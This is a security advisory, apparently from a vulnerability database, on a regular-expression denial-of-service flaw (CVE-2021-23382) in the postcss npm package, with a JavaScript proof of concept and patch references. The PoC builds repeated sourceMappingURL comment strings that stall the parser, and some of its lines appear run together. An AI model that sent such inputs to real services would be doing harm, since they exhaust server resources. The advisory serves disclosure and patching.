MEDIUM 5.3 npm
Regular Expression Denial of Service in postcss
GHSA-566m-qj78-rww5 · CVE-2021-23382
Published · Modified
Description
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
PoC
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
References
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2021-23382
- WEB https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956
- WEB https://github.com/postcss/postcss/releases/tag/7.0.36
- WEB https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641
- WEB https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640
Ready to move
Start Securing
Free, no credit card | First findings in minutes